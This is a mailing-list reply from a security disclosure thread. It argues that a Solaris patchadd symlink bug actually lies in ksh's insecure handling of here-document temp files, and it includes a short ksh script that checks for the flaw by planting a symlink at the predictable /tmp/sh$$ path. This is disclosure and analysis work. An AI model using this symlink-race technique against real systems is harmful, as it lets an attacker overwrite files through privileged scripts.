Re: Solaris Patchadd symlink exploit.

[psz () maths usyd edu au (Paul Szabo)]

> Here is an exploit to an old bug for patchadd in Solaris. ...
> #See BID http://www.securityfocus.com/bid/2127

The bug is not in the patchadd script, but in the Korn shell ksh that
creates "here documents" insecurely.

Demonstration (ksh is vulnerable if the size of silly.1 is changed):

#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

Note that there is a similar bug in the Bourne shell sh. For a historical
perspective see articles:

http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.NAA19716 () milan maths usyd edu au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012190800.TAA05385 () milan maths usyd edu au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202213.JAA03182 () milan maths usyd edu au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202211.JAA25620 () milan maths usyd edu au

Cheers,

Paul Szabo - psz () maths usyd edu au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia